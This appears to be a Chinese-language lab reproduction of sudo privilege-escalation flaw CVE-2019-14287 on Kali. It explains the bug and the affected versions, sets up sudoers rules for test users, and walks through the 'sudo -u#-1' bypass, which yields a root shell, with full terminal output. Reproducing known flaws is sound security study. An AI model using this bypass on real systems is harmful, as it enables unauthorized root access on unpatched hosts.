0x00 漏洞介绍
sudo本地权限提升漏洞(CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令
0x01 影响版本
sudo < 1.8.28
0x02 sudo作用
sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性
0x03 sudo权限
sudo权限控制在配置文件/etc/sudoers 中,该文件权限如下
root@kali:~# ls -al /etc/sudoers
-r--r----- 1 root root 669 Aug 7 02:58 /etc/sudoers
0x04 漏洞复现
系统平台:kali-2019.03
root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2019.3
Codename: kali-rolling
sudo版本
root@kali:~# sudo -V
Sudo version 1.8.27
备份sudo配置文件
root@kali:~# cp /etc/sudoers /etc/sudoers.bak
root@kali:~# ls -al /etc/sudoers*
-r--r----- 1 root root 669 Aug 7 02:58 /etc/sudoers
-r--r----- 1 root root 669 Nov 2 15:37 /etc/sudoers.bak
/etc/sudoers.d:
total 20
drwxr-xr-x 2 root root 4096 Oct 29 17:25 .
drwxr-xr-x 163 root root 12288 Nov 2 15:37 ..
-r--r----- 1 root root 958 Aug 7 02:58 README
新建普通用户
root@kali:~# useradd test
root@kali:~# passwd test
New password:
Retype new password:
passwd: password updated successfully
root@kali:~# useradd world
root@kali:~# passwd world
New password:
Retype new password:
passwd: password updated successfully
修改sudo配置文件
#打开配置文件
visudo
在配置文件添加以下内容,允许test用户可以以所有用户的身份运行id命令
#添加内容
test ALL=(ALL) /usr/bin/id
命令测试
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u root id
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for test:
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u world id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u world whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#0 id
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u#1001 id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u#0 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u#1001 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$
漏洞发现
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$
重新配置sudo配置文件,允许test用户可以以除了root用户以外的所有用户身份执行任意的命令
test ALL=(ALL,!root) ALL
命令测试
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u test id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u test whoami
test
$ sudo -u root id
Sorry, user test is not allowed to execute '/usr/bin/id' as root on kali.
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$
漏洞触发
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$ sudo -u#-1 whoami
root
$ sudo -u#-1 /bin/bash
root@kali:/root# id
uid=0(root) gid=1000(test) groups=1000(test)
root@kali:/root# whoami
root
root@kali:/root#